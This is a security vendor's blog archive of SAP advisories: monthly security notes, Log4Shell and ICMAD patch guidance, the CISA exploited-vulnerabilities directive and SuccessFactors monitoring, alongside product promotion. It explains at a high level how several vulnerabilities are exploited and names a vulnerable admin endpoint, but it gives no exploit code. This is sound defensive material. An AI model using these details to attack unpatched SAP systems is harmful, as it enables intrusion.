Layer Seven, Author at Layer Seven Security

Monitoring SuccessFactors with SAP Solution Manager

Layer Seven on March 29, 2022

SuccessFactors is a cloud SaaS solution from SAP for Human Capital Management. It includes a suite of applications for core HR functions such as employee management, recruitment, and payroll. It is often closely integrated with HCM functions in cloud or on-premise ERP systems using the Integration Add-On for SAP ERP HCM. The integration can be performed using SAP Integration Suite, Process Integration, or FTP/SFTP.

Similar to other cloud services such as SAP Cloud Platform, SAP Ariba, and SAP Concur, organizations can monitor SuccessFactors with SAP Solution Manager. Solution Manager includes metrics and alerts to monitor interfaces, scheduled jobs and application logs in SuccessFactors including Employee Central and Talent Management. It also supports monitoring for all integration scenarios between SuccessFactors and SAP ERP HCM. The scenarios are outlined in the diagram below.

Monitoring for cloud services including SuccessFactors can be configured using SAP Solution Manager Configuration – Managed Systems Configuration – Cloud Services Tab – Create Cloud Service. For the root URL, refer to SAP Note 2215682 – SuccessFactors API URLs for different Data Centers.

The second step is to create the endpoint for the cloud service. For SuccessFactors, you can create HTTPS and SFTP endpoints, depending on the integration scenario. Both endpoints require the setup of the SFAPI user in SuccessFactors. For more information, refer to note 2161909 – How to enable SFAPI in SuccessFactors. Cloud SSL certificates for HTTPS endpoints can be imported using STRUST. For a successful SSL handshake, the parameters icm/HTTPS/client_sni_enabled and ssl/client_sni_enabled should be set to true in Solution Manager.

Alerts for SuccessFactors can be enabled via SOLMAN_SETUP – Application Operations – Exception Management. SAP Solution Manager supports monitoring for the following log stores in SuccessFactors:

SuccessFactors Data Replication Errors
SuccessFactors Integration
SuccessFactors API
SuccessFactors Scheduled Jobs
SuccessFactors Simple Integration
SuccessFactors Smart Suite

Filter definitions for log stores can used to customize monitoring. You can add, remove or change filter fields and values. You can also use different operators for filter values.

SuccessFactors alerts can also be enabled using Interface and Connection Monitoring (ICMon) in Solution Manager. The monitoring templates for Cloud (Success Factors) or Web Services ABAP can be used to monitor exceptions in communication channels between the SAP Success Factors Integration add-on in SAP ERP and SAP Cloud Integration. This will enable alerts for areas such as Employee Data, Compensation, Recruiting, Onboarding, and Variable Pay. SuccessFactors alerts are automatically integrated with the Cybersecurity Extension for SAP and the SIEM Integrator for SAP.

SAP Security Notes, February 2022

Layer Seven on March 4, 2022

The central note 3131047 was updated with the addition of security notes 3142773 and 3139893 for the critical remote code execution vulnerability in the Apache Log4J 2 component. The new notes patch Log4Shell in SAP Commerce and SAP Dynamic Authorization Management and include manual procedures to apply both patches and workarounds.

Note 3140940 patches a code injection vulnerability in SAP Solution Manager due to missing segregation of duties in Root Cause Analysis (RCA) Tools. RCA supports central diagnostics and monitoring for SAP systems. Users with admin privileges are able to browse files and execute code through connected Diagnostics Agents. The note references note 3145008 for downloading the latest version of LM_SERVICE that contains the fix. It also references note 3137764 for removing links to the vulnerable applications.

Note 3140587 addresses a high-risk SQL injection vulnerability in the Workplace Server of NetWeaver Application Server ABAP. Note 3123427 provides a fix for a HTTP Request Smuggling vulnerability in SAP NetWeaver Application Server Java.

CISA, FBI Warn Organizations to Protect Against State-Sponsored Malware

Layer Seven on March 2, 2022

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint statement to advise organizations to prepare for increased cyber activity in the wake of the Russian invasion of Ukraine. According to the advisory, there is a risk that Russian cyber attacks will spread to government and business networks in the US and other NATO countries as a result of the growing international support for Ukraine and anticipated retaliation for sanctions imposed on Russia.

Threat actors deployed destructive malware against organizations in Ukraine in the lead up to the invasion. This included the wipers WhisperGate and HermeticWiper, designed to permanently corrupt data in infected hosts, rendering them unbootable. Both strains of malware masquerade as ransomware but have no decryption or data-recovery capabilities.

In response, CISA and the FBI urge all organizations to adopt a heightened posture towards cybersecurity and protecting their critical assets. Specifically, organizations are advised to secure remote access to networks, patch software to address known vulnerabilities, limit the attack surface by disabling unnecessary ports and services, and monitor, detect and respond to potential intrusions.

During this time of heightened risk, organizations can license the Cybersecurity Extension for SAP from Layer Seven Security free of charge for up to three months. According to Ian Thomson, Chief Operating Officer at Layer7, “Layer Seven Security is committed to supporting organizations protect their crucial SAP assets during this critical period. Our flagship solution the Cybersecurity Extension for SAP will be provided to customers without charge to help them secure mission-critical SAP applications and infrastructure from advanced persistent threats”.

The Cybersecurity Extension for SAP is an SAP-Certified addon for SAP Solution Manager. It implements leading-edge vulnerability management for SAP applications, databases, hosts and components, including application gateways such as the SAProuter and Web Dispatcher. It integrates with System Recommendations for detecting and managing the lifecycle of SAP security notes. The solution identifies vulnerabilities in custom ABAP code and monitors event logs in SAP systems to detect and alert for over 600 indicators of compromise. The solution also applies advanced anomaly detection powered by SAP HANA to detect unusual system and user behavior.

Contact Layer Seven Security using the link below to discuss licensing the Cybersecurity Extension for SAP free of charge to secure your SAP applications.

CONTACT

Security Advisory for Critical SAP ICMAD Vulnerabilities

Layer Seven on February 15, 2022

International threat intelligence agencies including the U.S Cybersecurity & Infrastructure Security Agency (CISA) and the Computer Emergency Response Team for the EU (CERT-EU) issued security advisories last week for critical vulnerabilities in the SAP Internet Communication Manager (ICM). The ICM supports inbound and outbound communication with SAP systems using the HTTP(S) protocol. It is a standard component of the NetWeaver Application Server ABAP and Java and the SAP Web Dispatcher.

The advisories relate to CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533, labelled ICMAD (Internet Communication Manager Advanced Desync). The most critical is CVE-2022-22536: a memory corruption vulnerability that can be exploited through a single HTTP request to fully compromise SAP systems, remotely and without authentication. This impacts AS ABAP and the Web Dispatcher when they are accessed through an HTTP gateway. For AS ABAP, the gateway could be the Web Dispatcher. The vulnerability does not impact direct access to SAP application servers. CVE-2022-22532 impacts AS Java only. This vulnerability has a lower CVSS than CVE-2022-22536 due to a higher attack complexity, but ranks high in terms of impact to Confidentiality, Integrity, and Availability. CVE-2022-22533 is for a lower priority denial of service vulnerability in AS Java triggered by requests that exhaust Memory Pipes (MPI) used for communicating between the ICM and work processes in application servers.

There is evidence of active scanning for ICMAD. SAP systems exposed to the Internet are especially vulnerable. External-facing Web Dispatchers are equally vulnerable. Consequently, it is critical to apply the relevant security notes to patch SAP systems against ICMAD.

Note 3123396 patches AS ABAP and the Web Dispatcher for CVE-2022-22536. SAP Kernels and Web Dispatchers should be updated to the minimum patch levels detailed in the note. The workaround detailed in note 3137885 can be applied as a stop-gap measure if the patches cannot be implemented at short notice. For access through the Web Dispatcher, refer to 3137885 to ensure that Web Dispatcher installations meet the minimum patch level. To apply the workaround, the profile parameter wdisp/additional_conn_close should be set to TRUE. For more details, refer to note 3138881.

Note 3123427 patches AS Java for CVE-2022-22532 and CVE-2022-22533. The workaround recommended in the note can be applied using the parameter setting icm/handle_http_pipeline_requests=FALSE if support for HTTP pipeline requests is not required.

The Cybersecurity Extension for SAP discovers vulnerable ABAP, Java and Web Dispatcher installations that have not been successfully patched for ICMAD. It also identifies missing or incorrectly applied workarounds if the corrections in notes 3123396 and 3123427 have not been applied. The SAP-certified solution performs over 1800 checks for known vulnerabilities in SAP applications and components and supporting databases and operating systems.

SAP Security Notes, January 2022

Layer Seven on February 3, 2022

Multiple Hot News notes were released in January as part of SAP’s continued efforts to patch solutions impacted by the critical Log4Shell vulnerability. This includes Process Orchestration (note 3130521), Data Intelligence (3130920) and Business One (3131740). The central note 3131047 consolidates patches for the remote code execution vulnerability in the vulnerable Apache Log4j 2 component.

Note 3112928 deals with reflected cross-site scripting and code injection vulnerabilities in S/4HANA. The solution implements checks for malicious file uploads or downloads using the SAP Virus Scan Interface (VSI). VSI provides an interface for third party anti-virus software to protect against the import of malicious code into SAP systems.

Note 3123196 was updated for a high priority OS code injection vulnerability in specific methods of a utility class in SAP NetWeaver Application Server ABAP. Malicious code can be injected using transaction SE24 (Class Builder) or SE80 (Object Navigator). Exploitation of the vulnerability requires permissions for authorization object S_DEVELOP with values CLAS and 16 for fields OBJTYPE and ACTVT, respectively. Therefore, restricting access to these permissions also mitigates the vulnerability.

Whitepaper: Securing SAP Solutions from Log4Shell

Layer Seven on January 18, 2022

Log4JShell is one of the most dangerous security vulnerabilities in decades. It can be exploited remotely with minimal complexity and without authentication to execute arbitrary code that could lead to the complete compromise of vulnerable applications.

Log4Shell impacts Log4J, a widely installed open-source Java logging utility. A dangerous zero-day remote code execution vulnerability in Log4J was reported in November last year. The vulnerability was patched in December and published in the National Vulnerability Database on December 12 as CVE-2021-44228.

Log4Shell was added to the Known Exploited Vulnerabilities (KEV) Catalog by the Cybersecurity and Infrastructure Security Agency (CISA) due to evidence of widespread active exploitation of the vulnerability by multiple threat actors. This includes nation state groups originating from China, Iran, Russia and North Korea. According to some reports, threat actors are exploiting the vulnerability to deploy ransomware payloads or to gain access to target networks. The access is then brokered to other threat actors.

Log4J is bundled in multiple SAP solutions including products such as SAP HANA and SAP Process Orchestration. Download the new whitepaper from Layer Seven Security to learn to mitigate and detect Log4Shell in SAP applications. The whitepaper includes a detailed breakdown of the vulnerability, guidance for patching and securing SAP solutions, and recommendations for detecting Log4shell signatures and indicators of compromise.

DOWNLOAD

SAP Security Notes, December 2021

Layer Seven on January 3, 2022

The central security note 3131047 consolidates Log4Shell patches for SAP products. Log4JShell is regarded as one of the most dangerous security vulnerabilities in decades. It can be exploited remotely with minimal complexity and without authentication to execute arbitrary code that could lead to the complete compromise of vulnerable applications.

Log4Shell impacts Log4J, a widely installed open-source Java logging utility, developed and maintained by the Apache Software Foundation. Log4J versions 2.14.1 and lower support remote message lookup substitution using the Java Naming and Directory Interface (JNDI) Application Programming Interface (API). Message lookup substitutions are used modify the Log4J configuration with dynamic values. The default setting for the JNDI property in Log4J enables values to be retrieved from remote sources.

A zero-day Remote Code Execution (RCE) vulnerability impacting the message lookup feature via JNDI in Log4J was discovered and reported by security researchers to the Apache Foundation on November 24, 2021. The vulnerability was patched by Apache on December 6 and published in the National Vulnerability Database on December 12 as CVE-2021-44228, also known as Log4Shell. A POC for the vulnerability was published on GitHub. CVE-2021-44228 has the maximum possible CVSS score of 10.0/10.0. The attack complexity is classified as low, requiring no privileges or user interaction.

Log4J is included in bundled in multiple SAP solutions. As of December 26, 2021, SAP had provided patches for products including SAP HANA XS Advanced (XSA) Runtime and XSA Cockpit, Process Orchestration, and Landscape Management. Patches were pending for multiple solutions including SAP Business One, Commerce, PowerDesigner, and Web IDE for HANA. Workarounds are provided for some of the unpatched solutions via Knowledge Based Articles (KBA).

Securing SAP Systems from Log4J Exploits

Layer Seven on December 17, 2021

The Cybersecurity and Infrastructure Security Agency (CISA) has designated the recent Log4J vulnerability as one of the most serious in decades and urged organizations to immediately address the vulnerability in applications.

Log4j is an open-source logging framework maintained by the Apache Foundation. The framework includes the API Java Naming and Directory Interface (JNDI). Strings passed through JNDI can force Log4J to query remote LDAP or other servers, download serialized Java code from the malicious servers, and execute the code during deserialization if message lookup substitution is enabled. This can lead to the complete compromise of impacted applications and systems. The remote code execution vulnerability impacts all versions of Log4J2 up to and including 2.14.1 in Java 8 or higher.

Message lookup substitution is disabled by default in Log4j 2.15.0. It has been removed altogether from 2.16.0. Therefore, customers should upgrade to the latest version of Log4J. The vulnerability is addressed by CVE-2021-44228 which has a base CVSS score of 10.0.

CISA has added CVE-2021-44228 to the Known Exploited Vulnerabilities Catalog due to evidence of widespread active exploitation of the vulnerability by multiple threat actors. This includes nation state groups originating from China, Russia, Iran, and North Korea. According to some reports, threat actors are exploiting the vulnerability to deploy ransomware payloads or to gain access to target networks. The access is then brokered to other threat actors.

Log4J is included in multiple SAP applications including SAP HANA XSA. The central note 3131047 includes available patches for impacted solutions. Refer to the SAP’s official response for details of all impacted products. Note 3129883 includes manual procedures for a workaround that will disable the loading of external code in Log4J using the J2EE Config Tool.

The Cybersecurity Extension for SAP identifies vulnerable SAP systems that have not been patched for the Log4J vulnerability. It also detects and alerts for suspected exploits targeted against SAP Java and Web Dispatcher installations based on exploit signatures. This includes known obfuscations and bypass methods.

SAP Security Notes, November 2021

Layer Seven on December 2, 2021

Hot news note 3089831 was updated for a SQL Injection vulnerability in SAP NZDT Mapping Table Framework. SAP NZDT (Near Zero Downtime Technology) is a service that supports system conversion with minimal downtime. The vulnerability could enable attackers to access backend databases by executing malicious queries or inject code through vulnerable NZDT function modules. The automatic corrections applied through the note deactivate some of the affected function modules and deactivates the import parameter for other function modules. As a result, the SAP Test Data Migration Server will no longer be usable after applying the fix. A workaround is included in the note if the fix cannot be applied. This will block external calls to the relevant function modules using Unified Connectivity (UCON). However, the function modules may still be called by local users with sufficient privileges.

Hot news note 3099776 patches a missing authorization check in the ABAP Platform Kernel. The vulnerability could be exploited to escalate privileges and access connected systems through RFC or HTTP connections. The recommended SP Stack Kernels in the note should be installed to apply a TCODE check that addresses the vulnerability.

Note 2827086 provides corrections for multiple vulnerabilities affecting SAP Forecasting and Replenishment for Retail in SAP Supply Chain Management (SCM). This includes memory corruption and denial of service.

Note 2971638 removes hardcoded credentials for CA Introscope Enterprise Manager in SAP Solution Manager and SAP Focused Run. Manual steps are also included in the note for updating the credentials.

Note 3110328 applies search restrictions to resolve a missing authorization check in the B2B Accelerator of SAP Commerce that could lead to an escalation of privileges.

CISA Issues Directive for Actively Exploited SAP Vulnerabilities

Layer Seven on November 23, 2021

The US Cybersecurity and Infrastructure Security Agency (CISA) issued Binding Operational Directive 22-01 on November 3 to compel government departments and agencies to remediate specific vulnerabilities with known exploits. According to CISA, the vulnerabilities pose a significant risk to information systems. This includes several vulnerabilities for SAP applications that must be remediated by May 3, 2022. Agencies have 60 days to review and update their vulnerability management policies in accordance with the Directive.

The Directive addresses weaknesses with the Common Vulnerability Scoring System (CVSS) used for rating Common Vulnerabilities and Exposures (CVE) in the National Vulnerability Database (NVD). CVSS does not take into account active exploitations for vulnerabilities. Most critical CVEs are highly complex and have no known exploits. The Directive shifts the focus to CVEs with active threats. These vulnerabilities are prioritized for remediation and are classified in the CISA catalog for Known Exploited Vulnerabilities (KEV).

The catalog includes six CVEs for SAP applications.

CVE-2010-5326 is for the invoker servlet implemented in the InvokerServletclass within the Web Container of the J2EE for SAP NetWeaver Application Java (AS Java). The invoker servlet is vulnerable to authentication bypass, enabling remote attackers to execute arbitrary code via HTTP or HTTPS requests. The servlet is disabled by default in higher versions of AS Java. Refer to SAP note 1445998 for disabling the relevant property of the servlet_jsp service on server nodes. SAP also recommends scanning or reviewing application code to identify the usage of servlets with the prefix “/servlet/”. Applications should use local servlets only that are defined in web.xml files. Auth constraints in web xml files are recommended to restrict the invoking of the servlet to users with an administrative role.

CVE-2016-3976 relates to a directory traversal vulnerability in AS Java that could be exploited to read arbitrary files from servers remotely and without authentication using CrashFileDownloadServlet. Note 2234971 provides a patch for the LM-CORE to address the CVE.

CVE-2020-6287 is for the RECON vulnerability in the LM Configuration Wizard of AS Java. Attackers can exploit a missing authentication check in the CTCWebService to perform administrative functions such as creating privileged users. Note 2934135 includes a patch to validate user input for log paths and block arbitrary log file locations and extensions.

CVE-2018-2380 relates to a directory traversal vulnerability in SAP CRM. There is a publicly-available exploit for the CVE that could be deployed to perform remote code execution through log file injection. Note 2547431 includes a patch to validate user input for log paths and block arbitrary log file locations and extensions.

CVE-2016-9563 is for a Denial of Service vulnerability in a BPM service within AS Java. This CVE also has a publicly-available exploit. Note 2296909 disables the resolving of external entities during XML parsing to address the CVE.

CVE-2020-6207 relates to a missing authentication check for the SAP EEM servlet in SAP Solution Manager. A module for the Metasploit penetration framework automates the exploitation of the CVE. This could be exploited to execute OS commands on connected SMDAgents via the /EemAdminService/EemAdmin page for User Experience Monitoring. Note 2890213 includes a patch for the impacted LM-SERVICE software component and instructions for a temporary workaround involving enabling authentication for the EemAdmin service in the Java stack of Solution Manager.

The Cybersecurity Extension for SAP is an SAP-certified solution that automates the discovery of applications vulnerable to the CVEs for SAP applications in the KEV catalog. It also monitors SAP logs to detect the signature of exploits targeting the CVEs and provides mechanisms to investigate and respond to the exploits.